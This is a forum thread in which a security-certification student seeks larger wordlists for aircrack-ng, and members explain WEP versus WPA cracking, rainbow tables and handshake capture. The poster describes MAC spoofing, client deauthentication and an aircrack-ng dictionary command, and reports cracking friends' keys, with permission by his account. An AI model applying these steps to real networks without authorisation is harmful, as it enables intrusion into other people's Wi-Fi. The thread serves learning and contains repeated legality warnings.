Issues with AIRCRACK-NG and password List

Not sure where else to post this but here.

I have been interested in security for a few years now and am hoping to land a career in this field many more years down the road.

I recently decided that i wanted to learn how to crack a WEP key for example.
Currently running a few programs like wireshark and the aircrack-ng package.
I am see different AP's and anything that is connected to it while capturing their packets. With that file i would be able to crack it if my list contains that pw if not i dont believe its possible. My issue at this point is that my password.lst file only has a possible 230 passwords when it checks. When i see the videos online these guys have thousands of possible passwords listed in their file.


Does anyone know where a file like this can be grabbed. Its just a simple text file with a word on each line. Only difference is the amount of possibilities in there. Really looking for a text file with the entire dictionary in it.


Any help here is appreciated.
CompTIA A+ Nov 25, 1997
CompTIA Network+ March 7, 2008
MCTS Vista 620 June 14, 2008
MCP Server 290 Nov 15, 2008
MCP Server 291 In Progress (Exam 12/28/09)
Cisco CCENT In Progress
MCP Server 291 In Progress
C|EH In Progress
«1

Comments

  • sexion8sexion8 Member Posts: 242
    ULWiz wrote:
    Not sure where else to post this but here.

    I have been interested in security for a few years now and am hoping to land a career in this field many more years down the road.

    I recently decided that i wanted to learn how to crack a WEP key for example.
    Currently running a few programs like wireshark and the aircrack-ng package.
    I am see different AP's and anything that is connected to it while capturing their packets. With that file i would be able to crack it if my list contains that pw if not i dont believe its possible. My issue at this point is that my password.lst file only has a possible 230 passwords when it checks. When i see the videos online these guys have thousands of possible passwords listed in their file.


    Does anyone know where a file like this can be grabbed. Its just a simple text file with a word on each line. Only difference is the amount of possibilities in there. Really looking for a text file with the entire dictionary in it.


    Any help here is appreciated.

    Google wordlist

    http://wordlist.sourceforge.net/
    "Everything we hear is an opinion, not a fact. Everything we see is a perspective, not the truth." - Marcus Aurelius
  • nevolvednevolved Member Posts: 131
    If you really want to crack WEP. then you should download and run Backtrack (it's a linux version that can be run from CD or USB key, or be installed). It comes configured with all the tools you will need for pen testing. Secondly, don't attempt to crack other people's WEP, that is a felony.
  • dynamikdynamik Banned Posts: 12,314 ■■■■■■■■□□
    That's a pretty inefficient way to crack WEP. Aircrack-ng should be all you need.
  • nevolvednevolved Member Posts: 131
    Well it sounds like he wants to investigate pen testing, why not use a platform that will support that? Is the windows version going to support packet injection? No, not to mention a whole host of other tools.
  • dynamikdynamik Banned Posts: 12,314 ■■■■■■■■□□
    Sorry, I was talking about brute-forcing WEP with dictionary lists, not BT ;)
  • nevolvednevolved Member Posts: 131
  • JDMurrayJDMurray MSIT InfoSec, CISSP, SSCP, GSEC, EnCE, C|EH, CySA+, PenTest+, CASP+, Security+ Surf City, USAAdmin Posts: 11,671 Admin
    Aircrack-ng is the best. Run it on Linux and make sure you have an approved wireless NIC.

    There is a Windows port of Aircrack-ng, but I've never tried it.
  • SieSie Member Posts: 1,195
    I think theres some confusion here.

    A password list is not needed for a WEP crack only the Airmon-ng Suite.

    If you cracking a WPA or WPA2 network you will need a good password list, theres many available you can search google for them.

    However the best current method for WPA cracking is the use of Rainbow Tables. If you have a very good Internet connection or Risk purchasing the CD's a very large pre hashed Rainbow Tables can be obtained from http://rainbowtables.shmoo.com/

    Also WPA Rainbow Tables pre hashed with common ESSID's can be had at http://www.renderlab.net/projects/WPA-tables/

    I must add, just to cover myself, you must have permission from the owner of the network. I dont take responsiblity etc etc. icon_wink.gif
    Foolproof systems don't take into account the ingenuity of fools
  • ULWizULWiz Member Posts: 722
    Not to be rude on the comment below. But did you seriously just post that.

    I said i am interested in the security aspect of computers.
    Currently working on one last test for MCSA and and taking my CCENT here shortly. After those two are attained i plan on finishing my CCNA and then my MCSE. After i have those certs and a few more years of expeirence i would like to go CEH and CISSP.

    Not for cracking my neighbors network which has absolutely nothing of importance. This is purely for learning purposes and how things like this work.

    Secondly, don't attempt to crack other people's WEP, that is a felony.

    I find it extremely interesting that i can not be connected to any network. Change my Wireless card to a different status and be able to see any WAP and any computers mac address.


    Currently my file has about 500K for possible password solutions the last link posted really bumped up my file.

    Appreciate the help.
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • SieSie Member Posts: 1,195
    You may have over 500K password listed but you can instantly discount any under 8 characters as these cannot be used for WPA passwords/pass phrases. Bear in mind the password can be anywhere from 8 to 63 characters in length for WPA if memory serves me correctly.

    Just out of interest how are you going about this?

    Deauthing a client and capturing the 4 way handshake with airodump?

    NB:
    The, do not hack its a felony is a required as im sure some armed robbers have gone to gun shops and said "Im just interested in guns I wasnt thinking of robbing anywhere". Anyway im sure you get my point, if your doing nothing illegal dont take offence.
    Foolproof systems don't take into account the ingenuity of fools
  • ULWizULWiz Member Posts: 722
    Currently just using the aircrack package on a linux platform.

    First thing i did was scan for available networks.
    Second i ran a command just to watch a single channel and network.
    At this point it opens a capture file.

    I mac spoofed my mac to a wireless client connected to that access point. Deauthorize it.

    Ran a test injection from aircrack and a attack on it sending aut requests at the ap i am trying to hit.

    From this point on i show a WPA handshake at the MAC of the AP

    Usually as long as i have 100k in IV i would shut down and run a test with my password list on the file.

    That is pretty much all i have gotten so far. Only been doing this for about 4 days. And really not any material on it out there.

    Hope i did not miss any steps there.
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • dynamikdynamik Banned Posts: 12,314 ■■■■■■■■□□
    Have you looked at this? http://www.aircrack-ng.org/doku.php?id=tutorial

    And as I said earlier, you don't need lists. AirCrack able to break the encryption based on the data you capture. I guess that's a viable approach if you don't have access to much captured data, but you can usually crack it within a few minutes.
  • SieSie Member Posts: 1,195
    Dynamik, Your absolutely correct for WEP however I think ULWiz is talking about WPA which would require a brute force approach hence the password lists.

    ULWiz, obviously your doing this on an authourised AP so why not add the known Passphrase to your password lists to ensure your doing the correct steps?

    As for little material out there you must be missing both the aircrack site itself:

    http://www.aircrack-ng.org/doku.php?id=airmon-ng

    and the Remote Exploit Forums:

    http://forums.remote-exploit.org/

    Creators of BackTrack.

    [Edit
    Haha, just noticed Dynamik posted the aircrack link aswell icon_wink.gif
    And 6800+ posts? Your fingers stubs yet bud? icon_lol.gif
    /Edit]
    Foolproof systems don't take into account the ingenuity of fools
  • ULWizULWiz Member Posts: 722
    i have looked at it but did not see a command that would just crack the WPA.

    The only format i have been able to do was to crack it if it was currently in my password.lst file.


    The average capture filed i have fulled was about 130MB in size with 100k something in packets captured.
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • ULWizULWiz Member Posts: 722
    I did actually run the scan first on my .cap file with the password not being in the list. The program said the key was not found. Tried to add my physical WPA password to the file and it did crack that as the actual passphrase.
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • ULWizULWiz Member Posts: 722
    Dynamik mind posting the command you see for this cause i dont see it.
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • SieSie Member Posts: 1,195
    So your doing it all right by the sounds of it just needing better password lists.

    Really the best option is Rainbow tables, take a look at the links I posted above.

    The passwords per second you get from rainbow tables compared to just password lists is amazing.

    If those are too big for you or you want to continue using just password lists check remote exploit forums as theres posts there containing links to wordlists.
    ULWiz wrote:
    Dynamik mind posting the command you see for this cause i dont see it.

    To be fair to Dynamik you did state this at the beginning and his response was correct.
    ULWiz wrote:
    I recently decided that i wanted to learn how to crack a WEP key for example.
    Foolproof systems don't take into account the ingenuity of fools
  • ULWizULWiz Member Posts: 722
    Currently running another scan on a previous capture. Added some more worl lists to it. Will kepp you posted on how big it actually is
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • dynamikdynamik Banned Posts: 12,314 ■■■■■■■■□□
    Sie wrote:
    Dynamik, Your absolutely correct for WEP however I think ULWiz is talking about WPA which would require a brute force approach hence the password lists.

    You were the first one to mention WPA, and that was in the 9th post. When did we switch over to that? icon_scratch.gificon_lol.gif

    UL, are you trying to crack WEP or WPA?

    Here's another article for you: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
  • ULWizULWiz Member Posts: 722
    Dynamik my first post was geared towards WEP. I am actually interested in both. Currently trying for a WPA which is my home network. I could always switch my own to be a WEP to learn that.

    Is there a diffrence in commands from each one.

    i am pretty much doing the following

    aircrack-ng -w ulwiz.lst output-01.cap

    This begins my crack with my current password lst.

    Not sure how else to do it.

    I will take a look at the link you just posted.
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • LarryDaManLarryDaMan Member Posts: 797
    dynamik wrote:
    Sie wrote:
    Dynamik, Your absolutely correct for WEP however I think ULWiz is talking about WPA which would require a brute force approach hence the password lists.

    You were the first one to mention WPA, and that was in the 9th post. When did we switch over to that? icon_scratch.gificon_lol.gif

    UL, are you trying to crack WEP or WPA?

    Here's another article for you: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

    Yeah, I was going to say the same thing. This started as a WEP crack which is MUCH easier.
  • SieSie Member Posts: 1,195
    dynamik wrote:
    Sie wrote:
    Dynamik, Your absolutely correct for WEP however I think ULWiz is talking about WPA which would require a brute force approach hence the password lists.

    You were the first one to mention WPA, and that was in the 9th post. When did we switch over to that? icon_scratch.gificon_lol.gif

    UL, are you trying to crack WEP or WPA?

    Here's another article for you: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

    He mentioned Password lists and was talking about them. WEP doesnt need that so I just assumed he meant WPA!

    Its your fault ULWiz!! haha.

    Yes WEP and WPA are different.

    WEP only requires the capture of enough data packets (IV's) and aircrack can crack this without a password list.

    WPA requires you capture a four way handshake and run aircrack and a password list against the cap file. Essentially runnning a brute force password crack.
    Foolproof systems don't take into account the ingenuity of fools
  • JDMurrayJDMurray MSIT InfoSec, CISSP, SSCP, GSEC, EnCE, C|EH, CySA+, PenTest+, CASP+, Security+ Surf City, USAAdmin Posts: 11,671 Admin
    Sie wrote:
    WPA requires you capture a four way handshake and run aircrack and a password list against the cap file. Essentially runnning a brute force password crack.
    Well, good luck with that. No WPA-PSK passphrase I've ever used has appeared in any dictionary. It would take pure brute force or nothing.

    And if you are using a password list, dictionary, or rainbow tables you aren't performing a brute force attack. You're just iterating through a lookup table, not trying every possible value of a key space.
  • SieSie Member Posts: 1,195
    JDMurray wrote:
    Sie wrote:
    WPA requires you capture a four way handshake and run aircrack and a password list against the cap file. Essentially runnning a brute force password crack.
    Well, good luck with that. No WPA-PSK passphrase I've ever used has appeared in any dictionary. It would take pure brute force or nothing.

    I agree, I never said they would be there but up till now I havent heard of an alternative for WPA. It all depends on the admin who setup the AP and their choice of passphrase.

    Also thanks for pointing out that error.
    It infact isnt a brute force, it purely is a dictionary/password list based attack. Its a looooooooong night icon_sad.gif
    Foolproof systems don't take into account the ingenuity of fools
  • JDMurrayJDMurray MSIT InfoSec, CISSP, SSCP, GSEC, EnCE, C|EH, CySA+, PenTest+, CASP+, Security+ Surf City, USAAdmin Posts: 11,671 Admin
    Sie wrote:
    Also thanks for pointing out that error.
    It infact isnt a brute force, it purely is a dictionary/password list based attack. Its a looooooooong night icon_sad.gif
    No worries. Studying for the CISSP has got me nit-picking over the slightest details. I'll laugh out loud if I get a question on my exam about password cracking using brute force and lookup tables.
  • ULWizULWiz Member Posts: 722
    Well just wanted to make another post on my experience with this.

    So at this point from what i understand I cant crack a WPA key unless that exact phrase is in my password lst file. This is stirctly for WPA keys though.

    Got to my friends house last night who currently only has a WEP key. Asked him if he would let me try and get in.

    Started a capture on his router and 30 minutes later i stopped the capture on him.
    Ran a aircrack command on the file i captured with his BSSID.

    Within a few seconds i had a key. Added that key to my wireless card and was able to connect to his network. Overall this process took me 35 minutes to get on.

    Really cant believe this was so simple and can definately understand why they had to move to WPA keys and a more secure standard.
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • ULWizULWiz Member Posts: 722
    So over this weekend I was at a few at my friends houses and they let me attempt to get their access key on both WPA and a WEP setup.

    For the attempt on the WEP i capture him just checking out random youtube vids. Captured for 30 minutes and quit. At that point the capture file was around 30mb. Ran the aircrack against his bssid and had a key within 15 seconds. Took that key and attempted to get on.
    Not sure how many IV's you actually need to capture for a WEP crack attempt.



    For the WPA attempt on my other friendsn network of course needs to go against my personal password list. So far i am still not sure how big my file is. The last one broke on the 612,906 word in my file so i would assume i am close to around 800k in possibilities. Captured on him for a while again. Got a fake WPA handshake and stopped the capture on him as well. Ran aircrack again against my password list and did not have a key before i left his house. When we got to the diner 30 minutes later it has his passphrase. Called him this morning to confirm the key and it was correct.

    So WEP can always be cracked as long as enough is captured in the air. A WPA key is almost luck depending on how many possible password you have in that file. Running complex password with symbols and lower case and upper case letter is definately a key for keeping things safe.


    Anyways just wanted to share my learning experience on this
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
  • dynamikdynamik Banned Posts: 12,314 ■■■■■■■■□□
    You can actually have it crack WEP in real time, so you don't have to wait for it to capture a certain amount, stop, and then try to crack it with what you have. A network with decent traffic should only take about 5-10 minutes.

    It's pretty funny that you got into his WPA as well though. So was it just a dictionary word/phrase, or was it semi-random characters? What was the length?

    I got mine from here: https://www.grc.com/passwords.htm If you're ever in MN, you're welcome to stop by and give it a try icon_lol.gif

    Do you have any idea how long it took me to enter that into my Wii with that stupid remote?
  • mamonomamono Member Posts: 776 ■■□□□□□□□□
    dynamik wrote:
    I got mine from here: https://www.grc.com/passwords.htm If you're ever in MN, you're welcome to stop by and give it a try icon_lol.gif

    I use the same source for my WPA passphrase and for all the WPA passphrases for any wifi networks that I setup. PITA when the passphrase gets lost, IMHO. Try writing that on a post-it to put on the router. Thank goodness for write protected USB thumb drives!

    dynamik wrote:
    Do you have any idea how long it took me to enter that into my Wii with that stupid remote?

    Not just the Wii, but also the Nintendo DS and PSP! icon_eek.gif
  • ULWizULWiz Member Posts: 722
    dynamik that is what i have been wondering myself. How many people actually use a standard word for a password. My one friend was lonestar while the other was studio54. Both where in the file i put together.

    It was definately a interesting experience and i did learn a little from it.
    CompTIA A+ Nov 25, 1997
    CompTIA Network+ March 7, 2008
    MCTS Vista 620 June 14, 2008
    MCP Server 290 Nov 15, 2008
    MCP Server 291 In Progress (Exam 12/28/09)
    Cisco CCENT In Progress
    MCP Server 291 In Progress
    C|EH In Progress
Sign In or Register to comment.